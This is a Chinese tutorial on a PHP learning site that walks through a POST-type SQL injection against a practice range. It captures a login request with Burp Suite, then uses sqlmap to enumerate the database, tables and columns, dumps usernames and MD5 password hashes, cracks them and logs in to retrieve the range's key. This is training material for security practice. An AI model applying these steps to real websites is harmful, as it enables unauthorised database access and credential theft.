微信公众号讲师中心

首页

文章

后端开发 web前端数据库开发工具 php框架常见问题科技 Java 系统教程电脑教程硬件教程手机教程软件教程游戏教程自媒体新闻

专题

后端开发 web前端数据库开发工具 php框架科技 Java 系统教程电脑教程硬件教程手机教程软件教程游戏教程新闻

AI工具

AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令

学习

大前端后端开发数据库移动端运维开发计算机基础

编程手册

大前端后端开发数据库移动端运维开发计算机基础

下载

js特效网站源码工具下载类库下载网站素材学习资源插件扩展手机/移动开发手机游戏

搜索

后端开发 web前端数据库开发工具 php框架常见问题科技 Java 系统教程电脑教程硬件教程手机教程软件教程游戏教程

首页 > 系统教程 > Windows系列 > 正文

POST型SQL注入教学

蓮花仙者

发布： 2025-09-20 08:01:14

原创

470人浏览过

本次教程将使用burpsuite、sqlmap和浏览器进行教学。我们将展示如何使用这些工具来进行post型sql注入。

首先，我推荐大家使用AJE-Windows工具包，它包含了所有我们需要的工具，这样就不需要一个个下载，非常方便。

接下来，我将介绍SQLMAP中一些常用的模块参数：

```
--current-db
```
登录后复制
：用于获取当前使用的数据库。
```
--tables
```
登录后复制
：列出指定数据库中的表。
```
--columns
```
登录后复制
：获取当前数据库中当前表的所有列名。
```
--dump
```
登录后复制
：获取当前数据库中当前表的所有用户名和密码。

让我们开始吧，首先打开AJE-Windows，然后启动SQLMAP和burpsuite。

POST型SQL注入教学靶场地址是http://219.153.49.228:45888。

POST型SQL注入教学我们随便输入一个账号和密码，然后在burpsuite中开启拦截功能，点击登录按钮。将拦截到的数据包通过右键发送到repeater。

POST型SQL注入教学右键选择将文件复制到桌面。

POST型SQL注入教学输入文件名并点击保存。

POST型SQL注入教学然后输入命令

sqlmap.py -r

登录后复制

加上刚才保存的数据包路径（可以直接拖拽文件到命令行）

--current-db

登录后复制

，然后按回车。

POST型SQL注入教学运行结果显示，这个站点常用的数据库名是

mozhe_Discuz_StormGroup

登录后复制

。

POST型SQL注入教学接下来，我们要获取数据库表名，输入命令

sqlmap.py -r

登录后复制

抓包的文件

-D

登录后复制

该站点用的数据库名

--tables

登录后复制

。

结果显示表名是

StormGroup_member

登录后复制

。

豆包爱学

豆包爱学

豆包旗下AI学习应用

豆包爱学

674

豆包爱学

POST型SQL注入教学然后我们获取表内的字段，输入命令

sqlmap.py -r

登录后复制

数据包文件

-D

登录后复制

数据库名

-T

登录后复制

表名

--columns

登录后复制

。

结果显示表内的字段有

name

登录后复制

和

password

登录后复制

，分别是用户名和密码的列名。

POST型SQL注入教学接下来我们获取用户名和密码，输入命令

sqlmap.py -r

登录后复制

数据包文件

-D

登录后复制

库名

-T

登录后复制

表名

-C

登录后复制

name,password

--dump

登录后复制

。

第一个用户名是

mozhe

登录后复制

，第二个也是，第一个密码是

356f589a7df439f6f744ff19bb8092c0

登录后复制

，第二个密码是

cac346c4e78571439ba96bc5a47c01b6

登录后复制

，它们使用的是MD5加密，第一个密码解密后是

dsan13

登录后复制

。

POST型SQL注入教学我们尝试使用第一个用户名和密码登陆，结果失败了。

POST型SQL注入教学然后尝试第二个用户名和密码，第二个密码解密后是

登录后复制

。

POST型SQL注入教学我们使用第二个用户名和密码尝试登陆，结果成功了，获取到的key是

mozhe4953564e012470c2374e45919c2

登录后复制

。

POST型SQL注入教学提交key。

POST型SQL注入教学好的，本次教学就到这里。如果你喜欢我的文章，欢迎点赞、关注，并订阅我的专栏，或者加入我的专栏。如果有任何不足之处，欢迎通过QQ3516634930反馈给我。

以上就是POST型SQL注入教学的详细内容，更多请关注php中文网其它相关文章！

相关标签：

word windows 浏览器工具 qq discuz win sql注入 sql windows 数据库 http

大家都在看：

win11怎么重置电脑并保留个人文件_Windows11重置系统保留数据教程 windows10便笺数据如何备份和恢复_Windows便笺内容备份与恢复方法 win11任务栏时间不显示秒数怎么设置 win11任务栏显示秒数设置方法 win10的“资源监视器”中网络活动没有数据怎么办_恢复资源监视器显示网络数据的方法 windows10如何恢复已删除的便笺_Windows便笺数据找回与恢复方法

最佳 Windows 性能的顶级免费优化软件

最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移，垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是，许多工具可以让 Windows 保持平稳运行。

来源：php中文网

上一篇：win10家庭版如何开启组策略gpedit.msc_家庭版开启组策略功能教程下一篇：电脑格式化数据时怎么防止恢复

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

最新问题

win10睡眠模式唤不醒怎么办 win10黑屏无法唤醒问题修复教程首先确认唤醒操作正确，再检查IntelManagementEngineInterface设置、重置电源计划、更新或回滚显卡驱动，最后通过U盘启动盘修复系统。

2025-11-10 20:42:02

337

win11怎么禁用遥测服务 Win11关闭用户数据收集与反馈首先将诊断数据设为基本并关闭可选数据上传，再通过服务管理器禁用“连接的用户体验和遥测”服务，专业版用户可使用组策略设置遥测级别为安全，也可用PowerShell命令停用DiagTrack服务，最后通过注册表创建AllowTelemetry项并设值为0以彻底关闭数据收集。

2025-11-10 20:33:28

319

windows11如何反转鼠标滚轮方向_Windows 11鼠标滚轮方向反转设置方法首先通过辅助功能设置反转滚轮方向，若无效则重置鼠标驱动，最后可修改注册表FlipFlopWheel值调整。

2025-11-10 20:32:02

670

windows11如何格式化硬盘_Windows 11硬盘格式化与数据清空方法使用磁盘管理可快速格式化非系统分区；2.DiskPart命令行工具适合高级用户精确操作；3.设置中重置电脑可彻底清空C盘并重装系统；4.第三方工具能永久擦除数据防恢复。

2025-11-10 20:30:03

398

win10开机慢怎么办 win10优化启动项提升开机速度通过管理启动项、启用快速启动、优化系统配置、关闭视觉效果及清理磁盘，可显著提升Windows10开机速度。

2025-11-10 20:29:32

228

win11怎么查看本机的IP地址_Windows 11网络IP地址查询方法可通过设置应用、命令提示符、任务栏图标或控制面板查看Windows11本机IP地址。2.设置中进入网络属性可查IPv4地址；3.命令提示符输入ipconfig显示所有适配器信息；4.任务栏网络图标悬停后点击属性快速查看；5.控制面板中网络共享中心的连接状态详细信息亦可获取IP地址。

2025-11-10 20:29:02

268

win11开机后自动打开文件夹 Win11取消登录时还原以前的文件夹窗口先关闭文件资源管理器的会话恢复选项，再通过注册表或组策略彻底禁用：1、打开文件资源管理器选项，取消勾选“恢复上次浏览的文件夹”和“恢复上次文件夹窗口的位置”；2、在注册表中将HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionBrowser下的PersistBrowsers值设为0；3、专业版用户可启用本地组策略“退出时关闭所有资源管理器窗口”。

2025-11-10 20:25:03

362

win11远程桌面连接不上怎么办 Win11 RDP端口与防火墙配置检查首先确认远程桌面功能已启用，检查目标计算机是否开启远程桌面并确保RemoteDesktopServices服务正在运行；接着配置WindowsDefender防火墙允许远程桌面通信，勾选专用和公用网络下的远程桌面规则；然后验证本地与远程计算机之间的网络连通性，使用ping命令测试IP地址可达性；若仍无法连接，需检查本地组策略设置，通过gpedit.msc启用“允许用户通过使用远程桌面服务进行远程连接”；最后在部分网络环境下可修改注册表禁用RDP的UDP协议，导航至TerminalServices

2025-11-10 20:07:03

351

win10怎么安装net framework 3.5_win10 NET Framework安装方法缺少.NETFramework3.5可能导致旧版应用无法运行，可通过控制面板启用该功能并让系统自动下载文件；2.在无网络环境下可使用DISM命令结合本地镜像或独立CAB包进行离线安装，确保组件成功部署。

2025-11-10 20:03:29

417

win10无法访问共享文件夹怎么办 win10局域网共享权限设置排查首先启用网络发现和文件共享，确保局域网设备可被识别；接着在共享计算机上配置共享权限，为Everyone分配读取或更高权限；然后修改NTFS安全权限，添加Everyone并赋予相应磁盘访问权限；随后通过本地安全策略（secpol.msc）调整“拒绝从网络访问”和“从网络访问此计算机”策略，确保Guest账户未被拒绝且被允许访问；最后启用Guest账户并关闭密码保护共享以实现免凭据访问。

2025-11-10 20:03:02

408

相关专题

更多>

热门推荐

开源免费商场系统

广告

热门教程

更多>

相关推荐

热门推荐

最新课程

最新下载

更多>

网站特效

网站源码

网站素材

前端模板

关于我们免责申明举报中心意见反馈讲师合作广告合作最新更新 English: php中文网：公益在线php培训，帮助PHP学习者快速成长！; 关注服务号技术交流群

PHP中文网订阅号: 每天精选资源文章推送

PHP中文网APP: 随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

PHP学习

技术支持

返回顶部